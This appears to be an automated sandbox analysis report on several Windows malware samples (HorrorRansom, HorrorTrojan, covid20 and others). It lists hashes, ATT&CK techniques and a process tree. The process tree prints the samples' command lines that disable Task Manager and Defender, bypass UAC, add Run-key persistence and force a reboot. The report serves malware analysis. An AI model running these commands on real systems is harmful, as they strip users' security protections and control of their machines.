Analysis
-
max time kernel
11s -
max time network
14s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
08-11-2024 14:13
Behavioral task
behavioral1
Sample
Dest/HorrorBob2.exe
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
Dest/HorrorRansom 1.0 Final.exe
Resource
win11-20241007-en
Behavioral task
behavioral3
Sample
Dest/HorrorTrojan Ultimate Edition.exe
Resource
win11-20241007-en
Behavioral task
behavioral4
Sample
Dest/HorrorTrojan123.exe
Resource
win11-20241007-en
Behavioral task
behavioral5
Sample
Dest/Start.bat
Resource
win11-20241007-en
Behavioral task
behavioral6
Sample
Dest/covid20.exe
Resource
win11-20241007-en
Errors
General
-
Target
Dest/Start.bat
-
Size
59B
-
MD5
e802087cce5e0317e5badc64380d207b
-
SHA1
64e1f2a59da7caf0f1c206464724863db8829aaf
-
SHA256
c72166dd069087612430540b67d4771bae3899e9d928b587ca8ac24dd458c2e3
-
SHA512
e82a80520f5a9119bb45ce83a327f99dafc60c7b97b7754ac2ffdcbbea02c027a85f639f525da4ba869ae36837832d95eb846fd6c17304a749d094185691f406
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe aspack_v212_v242 -
Executes dropped EXE 2 IoCs
Processes:
CLWCP.exeflasher.exepid process 752 CLWCP.exe 4088 flasher.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\death666 = "C:\\HostFile.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" reg.exe -
Sets desktop wallpaper using registry 2 TTPs 3 IoCs
Processes:
reg.exeCLWCP.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\covid20\\bg.bmp" CLWCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" reg.exe -
Processes:
resource yara_rule behavioral5/memory/4780-0-0x0000000000400000-0x0000000001A7B000-memory.dmp upx behavioral5/memory/2116-1-0x0000000000400000-0x0000000000A12000-memory.dmp upx behavioral5/memory/5032-2-0x0000000000400000-0x000000000132F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\C18B.tmp\HostFile.exe upx behavioral5/memory/4780-79-0x0000000000400000-0x0000000001A7B000-memory.dmp upx behavioral5/memory/2116-81-0x0000000000400000-0x0000000000A12000-memory.dmp upx behavioral5/memory/5032-76-0x0000000000400000-0x000000000132F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\C498.tmp\Service64.exe upx -
Drops file in Windows directory 1 IoCs
Processes:
LogonUI.exedescription ioc process File created C:\Windows\rescache\_merged\425634766\3423304070.pri LogonUI.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 27 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
HorrorTrojan Ultimate Edition.exereg.exeHorrorRansom 1.0 Final.exeHorrorTrojan123.exeshutdown.exereg.exerundll32.exereg.execovid20.exeHorrorBob2.exereg.exeflasher.execmd.exereg.exenet.exereg.exereg.exereg.exereg.exereg.exereg.execmd.exeCLWCP.exeWScript.execmd.exereg.exenet1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HorrorTrojan Ultimate Edition.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HorrorRansom 1.0 Final.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HorrorTrojan123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language covid20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HorrorBob2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language flasher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CLWCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
Modifies data under HKEY_USERS 15 IoCs
Processes:
LogonUI.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "55" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 6 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exepid process 3184 reg.exe 3096 reg.exe 3680 reg.exe 5052 reg.exe 3356 reg.exe 4764 reg.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
shutdown.exedescription pid process Token: SeShutdownPrivilege 3152 shutdown.exe Token: SeRemoteShutdownPrivilege 3152 shutdown.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
HorrorTrojan123.exeLogonUI.exepid process 1724 HorrorTrojan123.exe 1724 HorrorTrojan123.exe 2552 LogonUI.exe 2552 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exeHorrorRansom 1.0 Final.execovid20.execmd.exeHorrorTrojan Ultimate Edition.execmd.exeHorrorBob2.execmd.exedescription pid process target process PID 2072 wrote to memory of 4780 2072 cmd.exe covid20.exe PID 2072 wrote to memory of 4780 2072 cmd.exe covid20.exe PID 2072 wrote to memory of 4780 2072 cmd.exe covid20.exe PID 2072 wrote to memory of 5032 2072 cmd.exe HorrorBob2.exe PID 2072 wrote to memory of 5032 2072 cmd.exe HorrorBob2.exe PID 2072 wrote to memory of 5032 2072 cmd.exe HorrorBob2.exe PID 2072 wrote to memory of 2116 2072 cmd.exe HorrorRansom 1.0 Final.exe PID 2072 wrote to memory of 2116 2072 cmd.exe HorrorRansom 1.0 Final.exe PID 2072 wrote to memory of 2116 2072 cmd.exe HorrorRansom 1.0 Final.exe PID 2072 wrote to memory of 1516 2072 cmd.exe HorrorTrojan Ultimate Edition.exe PID 2072 wrote to memory of 1516 2072 cmd.exe HorrorTrojan Ultimate Edition.exe PID 2072 wrote to memory of 1516 2072 cmd.exe HorrorTrojan Ultimate Edition.exe PID 2072 wrote to memory of 1724 2072 cmd.exe HorrorTrojan123.exe PID 2072 wrote to memory of 1724 2072 cmd.exe HorrorTrojan123.exe PID 2072 wrote to memory of 1724 2072 cmd.exe HorrorTrojan123.exe PID 2116 wrote to memory of 3408 2116 HorrorRansom 1.0 Final.exe cmd.exe PID 2116 wrote to memory of 3408 2116 HorrorRansom 1.0 Final.exe cmd.exe PID 2116 wrote to memory of 3408 2116 HorrorRansom 1.0 Final.exe cmd.exe PID 4780 wrote to memory of 572 4780 covid20.exe DllHost.exe PID 4780 wrote to memory of 572 4780 covid20.exe DllHost.exe PID 4780 wrote to memory of 572 4780 covid20.exe DllHost.exe PID 3408 wrote to memory of 3184 3408 cmd.exe reg.exe PID 3408 wrote to memory of 3184 3408 cmd.exe reg.exe PID 3408 wrote to memory of 3184 3408 cmd.exe reg.exe PID 1516 wrote to memory of 4332 1516 HorrorTrojan Ultimate Edition.exe wscript.exe PID 1516 wrote to memory of 4332 1516 HorrorTrojan Ultimate Edition.exe wscript.exe PID 3408 wrote to memory of 1420 3408 cmd.exe reg.exe PID 3408 wrote to memory of 1420 3408 cmd.exe reg.exe PID 3408 wrote to memory of 1420 3408 cmd.exe reg.exe PID 3408 wrote to memory of 3680 3408 cmd.exe reg.exe PID 3408 wrote to memory of 3680 3408 cmd.exe reg.exe PID 3408 wrote to memory of 3680 3408 cmd.exe reg.exe PID 3408 wrote to memory of 3096 3408 cmd.exe reg.exe PID 3408 wrote to memory of 3096 3408 cmd.exe reg.exe PID 3408 wrote to memory of 3096 3408 cmd.exe reg.exe PID 572 wrote to memory of 752 572 cmd.exe CLWCP.exe PID 572 wrote to memory of 752 572 cmd.exe CLWCP.exe PID 572 wrote to memory of 752 572 cmd.exe CLWCP.exe PID 3408 wrote to memory of 1672 3408 cmd.exe reg.exe PID 3408 wrote to memory of 1672 3408 cmd.exe reg.exe PID 3408 wrote to memory of 1672 3408 cmd.exe reg.exe PID 572 wrote to memory of 4088 572 cmd.exe flasher.exe PID 572 wrote to memory of 4088 572 cmd.exe flasher.exe PID 572 wrote to memory of 4088 572 cmd.exe flasher.exe PID 3408 wrote to memory of 4364 3408 cmd.exe reg.exe PID 3408 wrote to memory of 4364 3408 cmd.exe reg.exe PID 3408 wrote to memory of 4364 3408 cmd.exe reg.exe PID 572 wrote to memory of 2108 572 cmd.exe WScript.exe PID 572 wrote to memory of 2108 572 cmd.exe WScript.exe PID 572 wrote to memory of 2108 572 cmd.exe WScript.exe PID 3408 wrote to memory of 3152 3408 cmd.exe DllHost.exe PID 3408 wrote to memory of 3152 3408 cmd.exe DllHost.exe PID 3408 wrote to memory of 3152 3408 cmd.exe DllHost.exe PID 5032 wrote to memory of 828 5032 HorrorBob2.exe cmd.exe PID 5032 wrote to memory of 828 5032 HorrorBob2.exe cmd.exe PID 5032 wrote to memory of 828 5032 HorrorBob2.exe cmd.exe PID 828 wrote to memory of 1876 828 cmd.exe DllHost.exe PID 828 wrote to memory of 1876 828 cmd.exe DllHost.exe PID 828 wrote to memory of 1876 828 cmd.exe DllHost.exe PID 828 wrote to memory of 5052 828 cmd.exe reg.exe PID 828 wrote to memory of 5052 828 cmd.exe reg.exe PID 828 wrote to memory of 5052 828 cmd.exe reg.exe PID 828 wrote to memory of 4156 828 cmd.exe DllHost.exe PID 828 wrote to memory of 4156 828 cmd.exe DllHost.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dest\Start.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe"covid20.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bat" "3⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.execlwcp c:\covid20\bg.bmp4⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:752 -
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exeflasher 5 c:\covid20\covid.bmp4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4088 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\corona.vbs"4⤵
- System Location Discovery: System Language Discovery
PID:2108 -
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe"HorrorBob2.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C498.tmp\HorrorBob2.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Windows\SysWOW64\cscript.execscript prompt.vbs4⤵PID:1876
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5052 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f4⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:4156 -
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
- System Location Discovery: System Language Discovery
PID:1368 -
C:\Windows\SysWOW64\reg.exereg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3356 -
C:\Windows\SysWOW64\reg.exeReg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
PID:3468 -
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4764 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3344 -
C:\Windows\SysWOW64\net.exenet user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"4⤵
- System Location Discovery: System Language Discovery
PID:2644 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"5⤵
- System Location Discovery: System Language Discovery
PID:3352 -
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 004⤵PID:756
-
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe"HorrorRansom 1.0 Final.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C18B.tmp\BobuxGen.cmd""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3184 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f4⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:1420 -
C:\Windows\SysWOW64\reg.exereg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3680 -
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3096 -
C:\Windows\SysWOW64\reg.exeReg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
PID:1672 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4364 -
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 004⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3152 -
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe"HorrorTrojan Ultimate Edition.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\system32\wscript.exe"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\BEBC.tmp\BEBD.tmp\BEBE.vbs //Nologo3⤵PID:4332
-
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe"HorrorTrojan123.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1724
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3a06855 /state1:0x41c64e6d1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2552
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3152
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1876
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4156
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:756
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:572
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5a0679dce64fcf875f4208b823d4b85c0
SHA185abe3673db82bfe5b2c207dc98648e32afffea0
SHA25685a07013575a6a890c7b1d26adaa52f17616c4cca673617aa1fc0992aa29dda1
SHA5121e2740a09acc5b0d679acfd740feb3556638f1b6029078668bbb7e067b356fcecf23c5b317b02888822cc180c0eb5cb7e2caf63d92a74515ebc5a1031d80f3a6
-
Filesize
505KB
MD5e62ee6f1efc85cb36d62ab779db6e4ec
SHA1da07ec94cf2cb2b430e15bd0c5084996a47ee649
SHA25613b4ec59785a1b367efb691a3d5c86eb5aaf1ca0062521c4782e1baac6633f8a
SHA5128142086979ec1ca9675418e94326a40078400aff8587fc613e17164e034badd828e9615589e6cb8b9339da7cdc9bcb8c48e0890c5f288068f4b86ff659670a69
-
Filesize
21.5MB
MD5cb065726febf9c1a581f3008e678f524
SHA1f9a0058a57213cf7ce72eddf0616a938c8f4f4b1
SHA256d8f864128f2a79e2ff8179255ebfd06619325fec86103722b6418c3cbb41823f
SHA512b54a81cff5951b34478e777bc27cc4fd4a292b548f38162602c01e2594848e40fcfea5becfd789153c9a4fa75c354834a3a37cf3032c9857e9246bf850d24880
-
Filesize
130B
MD5e61624dced063c4ba5352bf487f12410
SHA140bd08928900cd97f444ffaa78d93dcaf913b274
SHA25682ac48c4f7edbab182aa0a8c320d5616ccdd2f0e83dc733b91e45521f85462a3
SHA5122a27db12d2af35e7b51a307eb8860800075867922d3d63a69da608c96bec045f3c64ac757674d2a40d7f4d9e55179fc2bddc17691919e18e109a5d4669c607ac
-
Filesize
445B
MD5b08e02e536917f897acb2d21f42f0a97
SHA1a078f1addfd3eeb0f0cb5fd206ff78e9dc0f3e45
SHA2562c68caeada2c251c5fc12694b7288a5790114ced4142867179e75d313efaa50c
SHA5121d1901c3c676bb6d99a39d1a0bab1a6ee378090390bb5e7fe66cf754b8dd772ac0b79ba1215fa758445db1deac200afcc5e1e1e32b2562df946c82b530ca95ab
-
Filesize
147KB
MD5738bbd119d8877f8342e1ff00fe60dff
SHA1fc11d85e3c5b46bd877e06985fec1a601ce396ed
SHA256548c9e22a04650efec06a0414d205d24600e08e0fac1beed7e8b4c03730962bb
SHA512f7a12c9a1403c9a1953387c5871d6e7865ba80c405f37c51f5c3e093bab9235b8a8ba62ad8b27f2079407e9672d47ac365c9cb08033ef349bd8c9906a30fefad
-
Filesize
246KB
MD59254ca1da9ff8ad492ca5fa06ca181c6
SHA170fa62e6232eae52467d29cf1c1dacb8a7aeab90
SHA25630676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6
SHA512a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a
-
Filesize
1KB
MD547f426fb3883f2da30e9aa2a7d693fa5
SHA150d843d68817717f21ba96d26a571ad996a5e35a
SHA256b1c9a35d14eec5c522fd82babfae348dc244996f75d36543347208acf6f0f85b
SHA5122e588a0d6e2fb86e447d165d28b0600a9fe6fd670b391f70a918c333259a5b171a18837c73927c3a6de3240557b1860fe7bc616801c3dc16b9d6373c362ffacb
-
Filesize
72KB
MD5c875f76e521f520404401122bd82630a
SHA13b1c78420a55b9a768b28168753c4e22982421ef
SHA256a58caeb57da3061620dccfc374b2fba87c3061d981782d47a5dcc287e1db1d11
SHA512b712f09c1b5fcee804da12c45e2404b265b9a18e40b9ede4f6336e3a42086e1b02bfe9ba1b5ec487251e6d96b15f5ed4a179690a8f4ae2cc36454a15f136b54b
-
Filesize
5.9MB
MD5ed30c76a614ec8db5e4ac22e2929f53d
SHA127ab24ede0ec37cedd2cbf4d9f7135375f031fa4
SHA25696df16e4bef56e83f8f1106834aa23caf05972549d1c24c1f7def12e6ef4d21a
SHA512ec941a162de8fb1b32a71256ba11104775ff67424a6098e61f8d362ecc6547458e1cc4343dacd2b8df359da487d66832c2813e951d733b29803402f8206dfa8b
-
Filesize
5KB
MD5b11c0b55dba339bbe3169584fa0eedd8
SHA18c201122fd73cea5d8d2aa2aa6f7c17d99b521d9
SHA256f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073
SHA5128424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006
-
Filesize
11.4MB
MD5b53852cb556ec28efc39b986caddb791
SHA15ce0819a7b1703f67272fa0f21546d0a8b2d7b0a
SHA256ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a
SHA5127da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599
-
Filesize
3.8MB
MD5040d29b801e3488f7aee3f9708128eea
SHA1433591a971325f7529cbb7a1d16645ff65ee10c7
SHA256fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de
SHA51279c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826